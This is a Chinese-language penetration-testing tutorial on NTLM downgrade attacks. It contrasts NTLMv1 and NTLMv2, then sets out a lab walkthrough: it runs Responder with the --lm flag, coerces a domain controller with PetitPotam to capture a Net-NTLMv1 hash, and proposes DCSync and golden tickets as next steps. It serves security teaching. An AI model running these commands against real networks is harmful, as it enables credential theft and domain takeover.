NTLM版本降级攻击

一、背景知识

NTLM（NT LAN Manager）是Microsoft开发的一种旧的认证协议，用于网络认证。尽管该协议已经被认为是不安全的并且被较新的协议所取代，但它在许多环境中仍然被启用，特别是在向后兼容性是一个考虑因素的地方。

这是一个指代NT Hash的术语。NT Hash是Windows操作系统中用户密码的一个散列版本。
当用户在Windows系统上设置或更改密码时，系统会通过MD4算法生成该密码的NT Hash。这个散列存储在本地（如果是本地账户）或在Active Directory中（如果是域账户）。
在渗透测试中，通常可从Windows系统中的SAM文件和域控的NTDS.dit文件中获得所有用户的hash，通过Mimikatz读取lsass.exe进程能获得已登录用户的NTLM hash

挑战/响应机制:
- NTLMv1：服务器向客户端发送一个16字节的随机数作为挑战。客户端使用其NTLM哈希对挑战进行加密以生成一个响应。
- NTLMv2：与v1不同，v2使用的是客户端和服务器都参与的随机挑战生成过程。客户端使用用户的NTLM哈希和其他信息生成一个响应。
哈希过程:
- NTLMv1：使用MD4哈希函数对用户密码进行哈希。
- NTLMv2：使用HMAC-MD5对用户的NTLM哈希和其他信息进行哈希。
时间戳:
- NTLMv1：不包括时间戳。
- NTLMv2：响应中包括时间戳，这增加了每次认证的唯一性，并有助于防止重放攻击。
服务器和客户端挑战:
- NTLMv1：只使用了服务器的挑战。
- NTLMv2：使用了服务器和客户端的挑战，提供了更好的保护。

虽然从Windows Vista/Server2008开始，域控默认禁用了NTLMv1协商，但如果当前域环境中，存在较为老旧版本的机器，管理员可能手动打开v1支持，以下是打开步骤：

在攻击者主机上使用responder.py监听后，只要有域控主机主动认证到攻击者主机，即可完成NTLM协商，让域控主动向攻击者主机发起认证，可以考虑强制认证漏洞，或劫持等方案。

测试环境：

主机名	主机IP	主机账户	主机描述
dc-main-1.qiuqiu.com	10.10.10.10	qiuqiu.com\domain_admin	主域
kali	10.100.0.4	–	攻击者kali主机，与域控网络连通

// --lm参数：尝试使用NTLMv1协商认证过程

responder -I eth0 -v --lm

利用强制认证漏洞，是得主域控使用自身机器账号，向攻击者主机发起认证过程：

python PetitPotam.py 10.100.0.4  10.10.10.10

responder成功接收到Net-NTLMv1哈希：

拿到域控机器账号的NTLM哈希后，就可以dcsync域管或者krbtgt账户的NTLM哈希，用于登陆域内任意主机，或者制作黄金票据等。

打赏